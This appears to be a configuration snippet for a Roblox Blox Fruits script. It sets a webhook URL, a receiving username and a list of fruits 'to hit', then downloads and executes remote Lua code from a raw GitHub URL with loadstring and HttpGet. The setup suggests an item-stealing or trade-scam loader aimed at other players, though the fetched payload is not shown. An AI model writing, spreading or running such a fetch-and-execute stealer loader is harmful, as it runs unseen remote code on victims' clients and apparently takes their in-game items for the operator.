Webhook =
    "https://webhook-protect.vercel.app/api/webhook?id=MENUOF9ZdDVCOGw0SGF0eEZtb2JVQTpIbnZxVFBUb3k0MmdmMENBcTRfSWVROG53Z3F4SUx1cW90WXVGUExCSWFDbkYwN0hDYlNhUXJlMEtEVFE0ajU3R0dxSDREeHZHTU1WeDQxelpfTUpyVDNKTGV3d2s4UHU4cW9CXzJWM3VvblBVYk5ubXNES0wxSklsdzU5N1REZEFaaWxBX21OMUFPQzZzeEc2Zy13em0teFRnSS1FWXV1TUNVVEZIQXNudnM" -- << Your Webhook
Usernames = {"Sezen_efsan01"} -- << Your username(-s).
FruitsToHit = {
    "Kitsune-Kitsune",
    "Yeti-Yeti",
    "Leopard-Leopard"} -- << Fruits you want

loadstring(game:HttpGet("https://raw.githubusercontent.com/surelyco/CutestCodes/refs/heads/main/V2"))()
